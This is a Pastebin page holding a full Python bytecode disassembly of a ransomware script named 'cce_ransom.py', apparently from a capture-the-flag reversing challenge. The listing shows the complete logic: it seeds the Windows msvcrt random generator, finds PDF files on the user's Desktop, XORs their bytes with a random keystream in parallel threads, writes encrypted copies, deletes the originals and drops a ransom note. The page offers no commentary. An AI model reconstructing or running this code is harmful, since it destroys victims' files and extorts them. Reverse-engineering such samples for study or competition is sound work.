realsung

Untitled

Sep 25th, 2021
686
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. magic b'610d0d0a'
  2. moddate b'01000000' (Thu Jan  1 09:00:01 1970)
  3. source_size: 1896731487
  4. code
  5.    argcount 0
  6.    nlocals 0
  7.    stacksize 7
  8.    flags 0040
  9.    code
  10.       640064016c005a00640064016c015a01640064016c025a02640064016c03
  11.       5a03640064016c045a046402640384005a05650664046b02900172486501
  12.       a007a1005a0865016a096a0aa00b6501a00c6508a101a101010065016a09
  13.       6a0aa00d6508a101010067005a0e67005a0f6502a0106405a0116504a012
  14.       6406a101a101a101a0036407a10144005d305a1365006a14650565136601
  15.       64088d025a156515a016a1000100650ea0176513a1010100650fa0176515
  16.       a101010071886409640a8400650f440083010100640b5a186518640c3700
  17.       5a186518640d37005a186518640e37005a186518640f37005a1865186410
  18.       37005a186518641137005a186518641237005a18650e44005d225a136518
  19.       65196513a01aa10083016413170037005a186513a01ba100010090017108
  20.       6502a0106414a0116504a0126406a101a101a101a01c6518a10101006401
  21.       5300
  22.   2           0 LOAD_CONST               0 (0)
  23.               2 LOAD_CONST               1 (None)
  24.               4 IMPORT_NAME              0 (threading)
  25.               6 STORE_NAME               0 (threading)
  26.  
  27.   3           8 LOAD_CONST               0 (0)
  28.              10 LOAD_CONST               1 (None)
  29.              12 IMPORT_NAME              1 (ctypes)
  30.              14 STORE_NAME               1 (ctypes)
  31.  
  32.   4          16 LOAD_CONST               0 (0)
  33.              18 LOAD_CONST               1 (None)
  34.              20 IMPORT_NAME              2 (pathlib)
  35.              22 STORE_NAME               2 (pathlib)
  36.  
  37.   5          24 LOAD_CONST               0 (0)
  38.              26 LOAD_CONST               1 (None)
  39.              28 IMPORT_NAME              3 (glob)
  40.              30 STORE_NAME               3 (glob)
  41.  
  42.   6          32 LOAD_CONST               0 (0)
  43.              34 LOAD_CONST               1 (None)
  44.              36 IMPORT_NAME              4 (os)
  45.              38 STORE_NAME               4 (os)
  46.  
  47.   8          40 LOAD_CONST               2 (<code object entrypt at 0x10afcb2f0, file "cce_ransom.py", line 8>)
  48.              42 LOAD_CONST               3 ('entrypt')
  49.              44 MAKE_FUNCTION            0
  50.              46 STORE_NAME               5 (entrypt)
  51.  
  52.  14          48 LOAD_NAME                6 (__name__)
  53.              50 LOAD_CONST               4 ('__main__')
  54.              52 COMPARE_OP               2 (==)
  55.              54 EXTENDED_ARG             1
  56.              56 POP_JUMP_IF_FALSE      328
  57.  
  58.  15          58 LOAD_NAME                1 (ctypes)
  59.              60 LOAD_METHOD              7 (c_int)
  60.              62 CALL_METHOD              0
  61.              64 STORE_NAME               8 (seed)
  62.  
  63.  16          66 LOAD_NAME                1 (ctypes)
  64.              68 LOAD_ATTR                9 (cdll)
  65.              70 LOAD_ATTR               10 (msvcrt)
  66.              72 LOAD_METHOD             11 (rand_s)
  67.              74 LOAD_NAME                1 (ctypes)
  68.              76 LOAD_METHOD             12 (pointer)
  69.              78 LOAD_NAME                8 (seed)
  70.              80 CALL_METHOD              1
  71.              82 CALL_METHOD              1
  72.              84 POP_TOP
  73.  
  74.  17          86 LOAD_NAME                1 (ctypes)
  75.              88 LOAD_ATTR                9 (cdll)
  76.              90 LOAD_ATTR               10 (msvcrt)
  77.              92 LOAD_METHOD             13 (srand)
  78.              94 LOAD_NAME                8 (seed)
  79.              96 CALL_METHOD              1
  80.              98 POP_TOP
  81.  
  82.  18         100 BUILD_LIST               0
  83.             102 STORE_NAME              14 (files)
  84.  
  85.  19         104 BUILD_LIST               0
  86.             106 STORE_NAME              15 (threads)
  87.  
  88.  20         108 LOAD_NAME                2 (pathlib)
  89.             110 LOAD_METHOD             16 (Path)
  90.             112 LOAD_CONST               5 ('{}\\Desktop')
  91.             114 LOAD_METHOD             17 (format)
  92.             116 LOAD_NAME                4 (os)
  93.             118 LOAD_METHOD             18 (getenv)
  94.             120 LOAD_CONST               6 ('USERPROFILE')
  95.             122 CALL_METHOD              1
  96.             124 CALL_METHOD              1
  97.             126 CALL_METHOD              1
  98.             128 LOAD_METHOD              3 (glob)
  99.             130 LOAD_CONST               7 ('*.pdf')
  100.             132 CALL_METHOD              1
  101.             134 GET_ITER
  102.         >>  136 FOR_ITER                48 (to 186)
  103.             138 STORE_NAME              19 (file)
  104.  
  105.  21         140 LOAD_NAME                0 (threading)
  106.             142 LOAD_ATTR               20 (Thread)
  107.             144 LOAD_NAME                5 (entrypt)
  108.             146 LOAD_NAME               19 (file)
  109.             148 BUILD_TUPLE              1
  110.             150 LOAD_CONST               8 (('target', 'args'))
  111.             152 CALL_FUNCTION_KW         2
  112.             154 STORE_NAME              21 (t)
  113.  
  114.  22         156 LOAD_NAME               21 (t)
  115.             158 LOAD_METHOD             22 (start)
  116.             160 CALL_METHOD              0
  117.             162 POP_TOP
  118.  
  119.  23         164 LOAD_NAME               14 (files)
  120.             166 LOAD_METHOD             23 (append)
  121.             168 LOAD_NAME               19 (file)
  122.             170 CALL_METHOD              1
  123.             172 POP_TOP
  124.  
  125.  24         174 LOAD_NAME               15 (threads)
  126.             176 LOAD_METHOD             23 (append)
  127.             178 LOAD_NAME               21 (t)
  128.             180 CALL_METHOD              1
  129.             182 POP_TOP
  130.             184 JUMP_ABSOLUTE          136
  131.  
  132.  25     >>  186 LOAD_CONST               9 (<code object <listcomp> at 0x10afcb3a0, file "cce_ransom.py", line 25>)
  133.             188 LOAD_CONST              10 ('<listcomp>')
  134.             190 MAKE_FUNCTION            0
  135.             192 LOAD_NAME               15 (threads)
  136.             194 GET_ITER
  137.             196 CALL_FUNCTION            1
  138.             198 POP_TOP
  139.  
  140.  26         200 LOAD_CONST              11 ('What happend to your files?\n')
  141.             202 STORE_NAME              24 (note)
  142.  
  143.  27         204 LOAD_NAME               24 (note)
  144.             206 LOAD_CONST              12 ('All of your files were protected by a strong encryption with random key based xor cipher\n\n')
  145.             208 INPLACE_ADD
  146.             210 STORE_NAME              24 (note)
  147.  
  148.  28         212 LOAD_NAME               24 (note)
  149.             214 LOAD_CONST              13 ('What do I do ?\n')
  150.             216 INPLACE_ADD
  151.             218 STORE_NAME              24 (note)
  152.  
  153.  29         220 LOAD_NAME               24 (note)
  154.             222 LOAD_CONST              14 ('So, there are two ways you can choose:\n')
  155.             224 INPLACE_ADD
  156.             226 STORE_NAME              24 (note)
  157.  
  158.  30         228 LOAD_NAME               24 (note)
  159.             230 LOAD_CONST              15 ('1. Wait for a miracle and broute force encryption keys\n')
  160.             232 INPLACE_ADD
  161.             234 STORE_NAME              24 (note)
  162.  
  163.  31         236 LOAD_NAME               24 (note)
  164.             238 LOAD_CONST              16 ('2. Spot a weakness of encryption scheme.\n\n')
  165.             240 INPLACE_ADD
  166.             242 STORE_NAME              24 (note)
  167.  
  168.  32         244 LOAD_NAME               24 (note)
  169.             246 LOAD_CONST              17 ('Good luck!\n\n')
  170.             248 INPLACE_ADD
  171.             250 STORE_NAME              24 (note)
  172.  
  173.  33         252 LOAD_NAME               24 (note)
  174.             254 LOAD_CONST              18 ('===== encrypted files =====\n')
  175.             256 INPLACE_ADD
  176.             258 STORE_NAME              24 (note)
  177.  
  178.  34         260 LOAD_NAME               14 (files)
  179.             262 GET_ITER
  180.         >>  264 FOR_ITER                34 (to 300)
  181.             266 STORE_NAME              19 (file)
  182.  
  183.  35         268 LOAD_NAME               24 (note)
  184.             270 LOAD_NAME               25 (str)
  185.             272 LOAD_NAME               19 (file)
  186.             274 LOAD_METHOD             26 (absolute)
  187.             276 CALL_METHOD              0
  188.             278 CALL_FUNCTION            1
  189.             280 LOAD_CONST              19 ('\n')
  190.             282 BINARY_ADD
  191.             284 INPLACE_ADD
  192.             286 STORE_NAME              24 (note)
  193.  
  194.  36         288 LOAD_NAME               19 (file)
  195.             290 LOAD_METHOD             27 (unlink)
  196.             292 CALL_METHOD              0
  197.             294 POP_TOP
  198.             296 EXTENDED_ARG             1
  199.             298 JUMP_ABSOLUTE          264
  200.  
  201.  37     >>  300 LOAD_NAME                2 (pathlib)
  202.             302 LOAD_METHOD             16 (Path)
  203.             304 LOAD_CONST              20 ('{}\\Desktop\\cce_ransom_note.txt')
  204.             306 LOAD_METHOD             17 (format)
  205.             308 LOAD_NAME                4 (os)
  206.             310 LOAD_METHOD             18 (getenv)
  207.             312 LOAD_CONST               6 ('USERPROFILE')
  208.             314 CALL_METHOD              1
  209.             316 CALL_METHOD              1
  210.             318 CALL_METHOD              1
  211.             320 LOAD_METHOD             28 (write_text)
  212.             322 LOAD_NAME               24 (note)
  213.             324 CALL_METHOD              1
  214.             326 POP_TOP
  215.         >>  328 LOAD_CONST               1 (None)
  216.             330 RETURN_VALUE
  217.    consts
  218.       0
  219.       None
  220.       code
  221.          argcount 1
  222.          nlocals 3
  223.          stacksize 6
  224.          flags 0043
  225.          code
  226.             74007c00a001a10083017d0174027c00a003a1006a04830144005d207d02
  227.             7c017c020500190074056a066a07a008a100640140004e0003003c00711a
  228.             7409a00a740b7c00a00ca100830164021700a101a00d7c01a10101006400
  229.             5300
  230.   9           0 LOAD_GLOBAL              0 (bytearray)
  231.               2 LOAD_FAST                0 (file)
  232.               4 LOAD_METHOD              1 (read_bytes)
  233.               6 CALL_METHOD              0
  234.               8 CALL_FUNCTION            1
  235.              10 STORE_FAST               1 (content)
  236.  
  237.  10          12 LOAD_GLOBAL              2 (range)
  238.              14 LOAD_FAST                0 (file)
  239.              16 LOAD_METHOD              3 (stat)
  240.              18 CALL_METHOD              0
  241.              20 LOAD_ATTR                4 (st_size)
  242.              22 CALL_FUNCTION            1
  243.              24 GET_ITER
  244.         >>   26 FOR_ITER                32 (to 60)
  245.              28 STORE_FAST               2 (i)
  246.  
  247.  11          30 LOAD_FAST                1 (content)
  248.              32 LOAD_FAST                2 (i)
  249.              34 DUP_TOP_TWO
  250.              36 BINARY_SUBSCR
  251.              38 LOAD_GLOBAL              5 (ctypes)
  252.              40 LOAD_ATTR                6 (cdll)
  253.              42 LOAD_ATTR                7 (msvcrt)
  254.              44 LOAD_METHOD              8 (rand)
  255.              46 CALL_METHOD              0
  256.              48 LOAD_CONST               1 (255)
  257.              50 BINARY_AND
  258.              52 INPLACE_XOR
  259.              54 ROT_THREE
  260.              56 STORE_SUBSCR
  261.              58 JUMP_ABSOLUTE           26
  262.  
  263.  12     >>   60 LOAD_GLOBAL              9 (pathlib)
  264.              62 LOAD_METHOD             10 (Path)
  265.              64 LOAD_GLOBAL             11 (str)
  266.              66 LOAD_FAST                0 (file)
  267.              68 LOAD_METHOD             12 (absolute)
  268.              70 CALL_METHOD              0
  269.              72 CALL_FUNCTION            1
  270.              74 LOAD_CONST               2 ('_cce_ransom')
  271.              76 BINARY_ADD
  272.              78 CALL_METHOD              1
  273.              80 LOAD_METHOD             13 (write_bytes)
  274.              82 LOAD_FAST                1 (content)
  275.              84 CALL_METHOD              1
  276.              86 POP_TOP
  277.              88 LOAD_CONST               0 (None)
  278.              90 RETURN_VALUE
  279.          consts
  280.             None
  281.             255
  282.             '_cce_ransom'
  283.          names ('bytearray', 'read_bytes', 'range', 'stat', 'st_size', 'ctypes', 'cdll', 'msvcrt', 'rand', 'pathlib', 'Path', 'str', 'absolute', 'write_bytes')
  284.          varnames ('file', 'content', 'i')
  285.          freevars ()
  286.          cellvars ()
  287.          filename 'cce_ransom.py'
  288.          name 'entrypt'
  289.          firstlineno 8
  290.          lnotab 00010c0112011e01
  291.       'entrypt'
  292.       '__main__'
  293.       '{}\\Desktop'
  294.       'USERPROFILE'
  295.       '*.pdf'
  296.       ('target', 'args')
  297.       code
  298.          argcount 1
  299.          nlocals 2
  300.          stacksize 4
  301.          flags 0043
  302.          code 67007c005d0c7d017c01a000a100910271045300
  303.  25           0 BUILD_LIST               0
  304.               2 LOAD_FAST                0 (.0)
  305.         >>    4 FOR_ITER                12 (to 18)
  306.               6 STORE_FAST               1 (t)
  307.               8 LOAD_FAST                1 (t)
  308.              10 LOAD_METHOD              0 (join)
  309.              12 CALL_METHOD              0
  310.              14 LIST_APPEND              2
  311.              16 JUMP_ABSOLUTE            4
  312.         >>   18 RETURN_VALUE
  313.          consts
  314.          names ('join',)
  315.          varnames ('.0', 't')
  316.          freevars ()
  317.          cellvars ()
  318.          filename 'cce_ransom.py'
  319.          name '<listcomp>'
  320.          firstlineno 25
  321.          lnotab
  322.       '<listcomp>'
  323.       'What happend to your files?\n'
  324.       'All of your files were protected by a strong encryption with random key based xor cipher\n\n'
  325.       'What do I do ?\n'
  326.       'So, there are two ways you can choose:\n'
  327.       '1. Wait for a miracle and broute force encryption keys\n'
  328.       '2. Spot a weakness of encryption scheme.\n\n'
  329.       'Good luck!\n\n'
  330.       '===== encrypted files =====\n'
  331.       '\n'
  332.       '{}\\Desktop\\cce_ransom_note.txt'
  333.    names ('threading', 'ctypes', 'pathlib', 'glob', 'os', 'entrypt', '__name__', 'c_int', 'seed', 'cdll', 'msvcrt', 'rand_s', 'pointer', 'srand', 'files', 'threads', 'Path', 'format', 'getenv', 'file', 'Thread', 't', 'start', 'append', 'note', 'str', 'absolute', 'unlink', 'write_text')
  334.    varnames ()
  335.    freevars ()
  336.    cellvars ()
  337.    filename 'cce_ransom.py'
  338.    name '<module>'
  339.    firstlineno 2
  340.    lnotab
  341.       0801080108010801080208060a01080114010e0104010401200110010801
  342.       0a010c010e0104010801080108010801080108010801080114010c01
  343.  
RAW Paste Data